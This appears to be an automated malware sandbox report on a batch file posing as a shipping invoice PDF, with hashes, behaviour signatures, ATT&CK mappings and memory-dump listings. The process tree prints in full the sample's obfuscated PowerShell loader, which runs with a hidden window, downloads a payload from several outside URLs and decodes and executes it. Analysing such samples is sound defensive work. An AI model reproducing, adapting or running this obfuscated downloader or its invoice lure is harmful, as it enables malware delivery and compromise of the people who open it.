ee6bd635882b8671a4dc5f087d23b486c8ec8a2cef029ebc7b54bed4f87cb87a

General

Target

Label_waybill_original_BL_invoice_packinglist_shipment_09_11_2024_0000000000000000000000000000_pdf.bat
Size

4KB
MD5

bdb2ee22df97ebe7dea52b5c6479e175
SHA1

2d53f84181ca00a1c0eb6a9761e23111b90d2b43
SHA256

a811d2e739d43b7394a0d9ebf5f710827a7d19316039fe76e6ea0fb50ead366e
SHA512

b559cc4a03ed9161688e5eb62adfc57baad6e845ae26c39ef471e37d121d01cd9e50a590b8e4da9a2eb74e35451ae108593bf8f1cadd7a572888b3567cf474d6
SSDEEP

96:JALO6TU9QVMzpFNaRiZhX1IkXMN8LIw67q4+p36ZfJ/LK:cO6TU9PzZaRuhlIkXMScw6G4u6/LK

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
4	788	powershell.exe
6	788	powershell.exe
10	788	powershell.exe
11	788	powershell.exe
12	788	powershell.exe
15	788	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
788	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
788	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	788	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 788	2168	cmd.exe	31
PID 2168 wrote to memory of 788	2168	cmd.exe	31
PID 2168 wrote to memory of 788	2168	cmd.exe	31
PID 788 wrote to memory of 2544	788	powershell.exe	33
PID 788 wrote to memory of 2544	788	powershell.exe	33
PID 788 wrote to memory of 2544	788	powershell.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Label_waybill_original_BL_invoice_packinglist_shipment_09_11_2024_0000000000000000000000000000_pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Bajeres='Eksempelsamlings';$Wheatgrass=${host}.Runspace;If ($Wheatgrass) {$Gdinforits++;$Bajeres+='Shipless';$Firs='su';$Bajeres+='Samlelinses';$Firs+='bs';$Bajeres+='Relativiseringens';$Firs+='tri';$Bajeres+='Athener';$Firs+='ng';};Function arthrostome($bebop){$Sydvesten=$bebop.Length-$Gdinforits;For( $Gdinfo=2;$Gdinfo -lt $Sydvesten;$Gdinfo+=3){$Iling17+=$bebop.$Firs.'Invoke'( $Gdinfo, $Gdinforits);}$Iling17;}function Omformuleres($Eloining){ . ($Agueweed) ($Eloining);}$Hematoblast=arthrostome 'V.MToo zUdiValW lMeaHa/Nv5S . r0tw Ar( AW OiUnn .d,ooAnwNasM B NOrTwi Pe1He0A . e0Fr;F FW diC n 6K,4Br;So SpxD.6,a4 .;Tr .ur jvLo:Or1An2si1 .Mi0Sw) h BaG,ieThc SkdyoAn/,k2 a0R,1,i0An0G.1Mo0.l1Ab cuF .i UrBeeS.f RoBexTe/ P1 A2g.1Ar.M 0I. ';$Unpuritanic=arthrostome 'SkU ,skleParWh- TAReg ce OnS tGt ';$kermises=arthrostome 'P h rtOvtOnpR,:El/Fo/Cl3 A6In. E5In0Su.Su1Ro7T.7A.. ,2Fl5A.0in/ A .f ZtO,eAcrArcDrh,uaVgn .cBaeSh.kom RdB pSo> ,hUntFltTepSasDi:ya/Pr/Mer,he,tamolHyaPocOpeKosgl. Mts.oSpp,e/GrA,efTutSce er ScBihBeaNonB.c Ue Y. MmFod Sp S> .hH t KtC.p.nsKa:Co/Ka/Unf ,u MnDidJua KcReiReo,en,aarerSurTieSkcN.iG fLee sIn.s,oSyrB,gSt/ini ,m eaIngk.e As.e/EcAUdfP,t ae ar oc AhM aGlnmuc.ie.d.A.mSndLap E ';$Hovedtemaets=arthrostome '.e>P. ';$Agueweed=arthrostome 'Bei .e,uxS, ';$Gdinfonevidence='Chequering';$Nothings = arthrostome 'A e.dcClh BoAl .% IaCap,ypFadStaFotK aNo% n\,ohGuaLibPrbUnuAdbSm. KB ,eUnk . De&Ge&Tr A,e ,cPuhGaoCh KltOr ';Omformuleres (arthrostome 'Pi$ g jl.uoSpb OaTalSt: aMShe Un UnFleStsunkM,e ,vB,rRad,oi hgPjeF sSa= P(Ilc,omL.dIn D /UncSh A $.eN toJatX.h .i.tnTrg,asSp).h ');Omformuleres (arthrostome 'Ab$.tgSmllooArbMiaS lPi:imA rU,cVeoR.cGaeFinCht Kr Aoliu us K= l$ IklieG rB m ri.isDreM sPu.StsTepGol,uiU.tO,(.m$ uH co.yv le .d tFre pmRaa Be at.ls A)Ac ');Omformuleres (arthrostome 'Li[ FNEueGatR,.U,SUde Lr Fv .i lcAteTaPo.oSmi,onGetPrMBraSinTraByg Ce nrB ] F:fr:OrS .e Tc u ,r,ni EtR y.eP rProLutInoa cBroTrlbl ,e=Pi Do[StNGyeAmt S. ,SFieGacunu prDdi ,tExy ,PPhrTroUttreoOrc aoThlPiT PyMopT eAp] I:D,:klT Pl As.a1Di2Fa ');$kermises=$Arcocentrous[0];$Mcen= (arthrostome 'S $V,g ,lE oHub Sa TlDe:.ySK.c ,et nMyeHdm ae .su.t e .r feBnnkosU,=PrNTreAfwUd-u OQubBujkoe ,c.mt.o .Sloyc,s ptI.e,am C. .NHae,etG,.R.WPlealbS C .lT.iC,e Un.et');$Mcen+=$Menneskevrdiges[1];Omformuleres ($Mcen);Omformuleres (arthrostome ' j$KoS Rc,geurnSue .mhoeArs OtC.e BrGeeA,nKrsGg.,kH eMiased Ke,trStsmi[Vo$ KUJan,ip.euKarH,iSytKka ,nLaiAdcDe]U.=Be$ HJue,pmUnaActHyoStbThlTraCos Ft.a ');$Faksimile=arthrostome 'Va$ ES hcBreMin.reBimP.eTys,etF,eMar aeBinOvs P.K,Df.osow nn Ul noFaa,odMeF BiSul aeBa(In$Imk,oe,tr,nm GiU,sKreGrs .,Sp$ FLPoiBrgRen.ei Un,egErsKosB.yugsMotHie.em.reRetIm) a ';$Ligningssystemet=$Menneskevrdiges[0];Omformuleres (arthrostome 'Ge$Irg.elStoLabSla .lJe:BoMw.eSklV.dYaeSudR,=K (HyTTae ps,ut .- iPReaXetR,hBa ,e$ TLStiPrgFan,fiNonSlgFasSls ,yF s mtQue Bm.oeuntTr)Tr ');while (!$Melded) {Omformuleres (arthrostome 'Bl$ Ig .l aofibLaa,elAs:KiT.thF eUncDraYgp,gh .oO,r .eVe=Sk$ ,tTrr.euGee ') ;Omformuleres $Faksimile;Omformuleres (arthrostome 'RuS DtTya TrNotEx- ,SOvl,leNoeK.pTa E4 o ');Omformuleres (arthrostome 'B $ ,g Fl SoChb Ya alUn: ,MG.e Pl DdB,eTrd ,= T( .T.ae assat s-ReP Oa rtMuhPr $ iLDiiEfgVinA i Bn Ignds.dsRay sFot .e emInePrt e)Ta ') ;Omformuleres (arthrostome 'Am$ Pg flflo.rbM.aSklOr:L,SCokBiuAurCakVeeRin.ieCas =K.$ ,gE,lTeoKrbTuaOrl i: PKPhj.loAnrCatKoeSal akgolPadTrtS + S+ %Sc$ MA.trRecUnoUncThe Pn Pt,orDro .uS.s C.moctro euRenFrt O ') ;$kermises=$Arcocentrous[$Skurkenes];}$Ferskenen=302018;$Staldendes=27144;Omformuleres (arthrostome 'Un$ .g olTaoEubmia jlU,: Ma,a eatugSteSmrdrstr ,f=Fe BlG ae tM.-.uC Fo ,nH to,e.un At No$T.L Ei Ug Sn SiLanR.gResM s,pyO sDitAne .mBaeFetMi ');Omformuleres (arthrostome 'Ps$VigdulI o,abDiau,lMy:giLV,iAfbFreAgr,aa fl iPesK.i hn .g A a=Fa An[PrS.fyMesAltsae GmAd.ImC Ro.lnovvPreLoruitPa]S,: A:F FOmrDko Dm CB LaMasAfePe6Ca4,jSOut LrSti.nnShg (Mo$S M SaE aU,gUne MrCasi,) E ');Omformuleres (arthrostome 'Ah$ChgPll aoT b.raU lja: tSWaukabSurVai UdnyeR nFitSklHyyGo Po=di A [CoSC ygusDatUneAnm u. TSee CxVitUn.TtEBynGacstoL.d niShnV.g.l]ve: :StASpSS.Ct.ISiIPu.MaG,reSit ASBotE,r Ei Sn mg ,(Be$,oLFoiOvb eAdrUna,olati Ds Gi nM gT.).e ');Omformuleres (arthrostome 'Af$ sg SlProWhb ga ClEn:FoTU.rTeo,lw ks,e=A.$,oS,euJubGrrLai.xdlyeEnnGetF,l ,yLo.SpsEmu.rbSks itStr .iGen Sg D(O.$ PFPseUnrBrsIgkL ePhn SeNenp., a$TrSM,tBea KlBedf,efrntodUde,os.i)Ob ');Omformuleres $Trows;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\habbub.Bek && echo t"
    3⤵
    PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/788-4-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download
memory/788-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/788-6-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/788-7-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-9-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-10-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-11-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-12-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/788-13-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing